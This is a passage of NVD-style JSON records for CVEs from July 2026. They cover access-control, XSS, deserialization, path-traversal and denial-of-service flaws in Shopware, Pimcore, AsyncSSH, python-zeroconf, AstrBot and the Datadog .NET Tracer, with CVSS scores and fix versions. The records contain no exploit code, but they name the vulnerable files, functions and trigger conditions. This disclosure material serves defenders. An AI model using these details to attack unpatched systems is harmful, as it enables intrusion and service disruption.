transition features /api/_action/order/{orderId}/state/{transition} and similar transaction and delivery transition routes in src/Core/Checkout/Order/Api/OrderActionController.php do not declare PlatformRequest::ATTRIBUTE_ACL or perform an explicit privilege check, so AclAnnotationValidator exits when route ACL metadata is absent and low-privileged users without order:update, order_transaction:update, or order_delivery:update can trigger StateMachineRegistry::transition() writes in SYSTEM_SCOPE. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/86dff24ba500e16325742e59d20357f57a79c2af","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/9f15faee704b61e8a96657024fa96c70b47ad082","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-f8q6-3g5w-jjr6","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48015","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:16.323","lastModified":"2026-07-17T19:17:15.720","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, SVG files are in the allowed_extensions whitelist in src/Core/Framework/Resources/config/packages/shopware.yaml and can be uploaded via the media manager without SVG content sanitization in the upload pipeline from MediaUploadController to FileSaver to TypeDetector, allowing malicious SVG JavaScript such as onload, <script>, and <foreignObject> to execute in the Shopware domain when the uploaded SVG is viewed. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T18:11:50.846781Z","id":"CVE-2026-48015","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/745a3ea3b77d4fe0f78c595ef527d8453a134497","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/fd6d39bdb62dfa06fe62c7c87b37607d84094cda","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-xvhc-gm7j-mhmc","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48016","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:16.457","lastModified":"2026-07-17T18:30:01.357","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, the Store API endpoint /store-api/handle-payment in src/Core/Checkout/Payment/SalesChannel/HandlePaymentMethodRoute.php accepts a user-controlled orderId and forwards it to src/Core/Checkout/Payment/PaymentProcessor.php without verifying order ownership or guest-order authentication, allowing a normal customer or guest context to trigger the payment flow for another user's order while /store-api/order enforces the expected ownership model. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/69dd5b6cb01d3c2aea49ac29dd4512a87836ac3f","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/df15f2e607dcf9ebc4a26ec622ffcf452dc25090","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-9v5m-39wh-5chq","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50273","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:16.840","lastModified":"2026-07-17T20:17:24.220","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Datadog .NET Tracer is a client library for Datadog APM for .NET applications. Prior to 3.43.0, Datadog tracing libraries that implement W3C baggage propagation parse incoming baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES on extraction, allowing a remote unauthenticated attacker to send a baggage header with many comma-separated key-value pairs or one very large value and cause unbounded CPU and memory consumption in services with baggage propagation enabled. This issue is fixed in version 3.43.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"DataDog","product":"dd-trace-dotnet","versions":[{"version":"< 3.43.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:46:28.497491Z","id":"CVE-2026-50273","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/DataDog/dd-trace-dotnet/commit/38092e0d41a36decbe649e048e48ae1b1607292f","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-dotnet/pull/8555","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-dotnet/releases/tag/v3.43.0","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-dotnet/security/advisories/GHSA-38wr-vpc7-2mp4","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-16073","sourceIdentifier":"cna@vuldb.com","published":"2026-07-17T19:17:13.103","lastModified":"2026-07-17T19:17:13.103","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"A security vulnerability has been detected in AstrBotDevs AstrBot up to 4.25.2. Affected by this issue is the function Star.text_to_image/NetworkRenderStrategy.render of the file astrbot/core/star/base.py of the component T2I Feature. The manipulation leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}],"affected":[{"source":"cna@vuldb.com","affectedData":[{"vendor":"AstrBotDevs","product":"AstrBot","cpes":["cpe:2.3:a:astrbot:astrbot:*:*:*:*:*:*:*:*"],"modules":["T2I Feature"],"versions":[{"version":"4.25.0","status":"affected"},{"version":"4.25.1","status":"affected"},{"version":"4.25.2","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://gist.github.com/YLChen-007/2abcecece4369c46cc8405e597c0528b","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-16073","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/852825","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379788","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379788/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-45162","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:14.167","lastModified":"2026-07-18T00:16:48.007","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Pimcore is an Open Source Data & Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.7, multiple Pimcore locations call PHP's unserialize() on data from database columns and filesystem files without the allowed_classes restriction, including lib/Tool/Authentication.php, models/Site/Dao.php, models/DataObject/ClassDefinition/CustomLayout/Dao.php, models/Tool/TmpStore/Dao.php, models/Asset/WebDAV/Service.php, and admin-ui-classic-bundle/src/Helper/Dashboard.php, enabling object injection and remote code execution if an attacker can control the serialized data source. This issue is fixed in versions 11.5.17 (LTS) and 12.3.7."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"pimcore","product":"pimcore","versions":[{"version":"< 11.5.17","status":"affected"},{"version":">= 12.0.0, < 12.3.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","baseScore":8.0,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.3,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T20:17:24.872137Z","id":"CVE-2026-45162","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://github.com/pimcore/pimcore/commit/4788bf3a3a7f2f760a8fe61e522565941e154e1e","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/pull/19119","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/releases/tag/v12.3.7","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-36fc-7wjg-mfvj","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45309","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:14.333","lastModified":"2026-07-17T19:17:14.333","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"AsyncSSH is a Python package which provides an asynchronous client and server implementation of the SSHv2 protocol on top of the Python asyncio framework. Prior to 2.23.0, AsyncSSH expands the OpenSSH-compatible AuthorizedKeysFile %u token in asyncssh/config.py, asyncssh/connection.py, asyncssh/auth_keys.py, and asyncssh/misc.py with the raw SSH username during pre-authentication server config reload, allowing a server configured with AuthorizedKeysFile authorized_keys/%u to read an authorized-keys file outside the intended directory when the SSH username contains /, \\, or .. path traversal segments and authenticate with an attacker-selected key file. This issue is fixed in version 2.23.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ronf","product":"asyncssh","versions":[{"version":"< 2.23.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://github.com/ronf/asyncssh/commit/2af2382cce946c959a378a62f257af253dc4ab51","source":"security-advisories@github.com"},{"url":"https://github.com/ronf/asyncssh/commit/3d515ba9ba0cd9990d248bdf62bcf05d51261a88","source":"security-advisories@github.com"},{"url":"https://github.com/ronf/asyncssh/security/advisories/GHSA-g794-3fmp-753h","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45703","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:14.790","lastModified":"2026-07-17T20:17:17.633","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Pimcore is an Open Source Data & Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.7, the WordExport export flow in bundles/WordExportBundle/src/Controller/TranslationController.php only checks the word_export feature permission and directly resolves attacker-controlled type/id input without enforcing view permission on page, snippet, email, or object elements, allowing a low-privileged backend user to export document content the user is not allowed to view. This issue is fixed in versions 11.5.17 (LTS) and 12.3.7."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"pimcore","product":"pimcore","versions":[{"version":"< 11.5.17","status":"affected"},{"version":">= 12.0.0, < 12.3.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.1,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:22:43.100980Z","id":"CVE-2026-45703","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/pimcore/pimcore/releases/tag/v12.3.7","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-47180","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:15.153","lastModified":"2026-07-17T20:17:18.700","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Zeroconf is a pure Python implementation of multicast DNS service discovery. Prior to 0.149.5, DNSIncoming._decode_labels_at_offset recurses once per DNS-name compression pointer, and a single mDNS packet carrying chained pointers can trigger a RecursionError that escapes DNSIncoming.__init__, causing sustained CPU burn, log flooding, and degraded mDNS-dependent features for unauthenticated hosts on the local link over UDP/5353 (224.0.0.251 / ff02::fb). This issue is fixed in version 0.149.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"python-zeroconf","product":"python-zeroconf","versions":[{"version":"< 0.149.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:21:22.892470Z","id":"CVE-2026-47180","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-674"}]}],"references":[{"url":"https://github.com/python-zeroconf/python-zeroconf/commit/f9e23592137f30fdf7ef710dba065da31c79b1cf","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/pull/1719","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/releases/tag/0.149.5","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/security/advisories/GHSA-9pgc-3ccv-5297","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-47183","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:15.303","lastModified":"2026-07-18T00:16:48.117","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Zeroconf is a pure Python implementation of multicast DNS service discovery. Prior to 0.149.6, DNSIncoming._log_exception_debug and the four QuietLogger exception-dedup methods stored an unbounded _seen_logs dictionary keyed by attacker-influenced IncomingDecodeError messages, retaining sys.exc_info() tracebacks whose frame locals kept raw packet self.data buffers and allowing unauthenticated hosts on the local link over UDP/5353 (224.0.0.251 / ff02::fb) to drive memory growth until mDNS-dependent features degrade or the process is OOM-killed. This issue is fixed in version 0.149.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"python-zeroconf","product":"python-zeroconf","versions":[{"version":"< 0.149.6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T21:08:53.994450Z","id":"CVE-2026-47183","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://github.com/python-zeroconf/python-zeroconf/commit/95561e28b24922358f1991e38e3a86d70d72dcec","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/issues/1714","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/pull/1717","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/releases/tag/0.149.6","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/security/advisories/GHSA-phvx-9mgw-67r5","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-47184","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:15.440","lastModified":"2026-07-17T19:17:15.440","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Zeroconf is a pure Python implementation of multicast DNS service discovery. Prior to 0.149.7, DNSCache._async_add inserted every response record into cache, _expirations, _expire_heap, and service_cache without a cap, allowing unauthenticated hosts on the local link over UDP/5353 (224.0.0.251 / ff02::fb) to multicast valid mDNS responses with unique names and cause memory exhaustion, slower cache lookups, slower async_expire passes, and broken discovery, registration, and ServiceBrowser callbacks. This issue is fixed in version 0.149.7."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"python-zeroconf","product":"python-zeroconf","versions":[{"version":"< 0.149.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/python-zeroconf/python-zeroconf/commit/0ad3f37b5b852b8f614d322283d148efb2cef6e4","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/issues/1715","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/pull/1718","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/releases/tag/0.149.7","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/security/advisories/GHSA-rfg2-pjw2-56x2","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48045","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:15.820","lastModified":"2026-07-17T20:17:20.610","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Zeroconf is a pure Python implementation of multicast DNS service discovery. Prior to 0.149.12, AsyncListener.handle_query_or_defer retained every truncated TC-bit incoming query, each up to _MAX_MSG_ABSOLUTE = 8966 bytes, in self._deferred[addr] and armed a per-address timer in self._timers[addr] without capping the per-address list or distinct addr keys, allowing unauthenticated hosts on the local link over UDP/5353 (224.0.0.251 / ff02::fb) to spoof sources, grow _deferred and _timers, and cause memory exhaustion and quadratic CPU burn. This issue is fixed in version 0.149.12."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"python-zeroconf","product":"python-zeroconf","versions":[{"version":"< 0.149.12","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:21:32.304752Z","id":"CVE-2026-48045","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 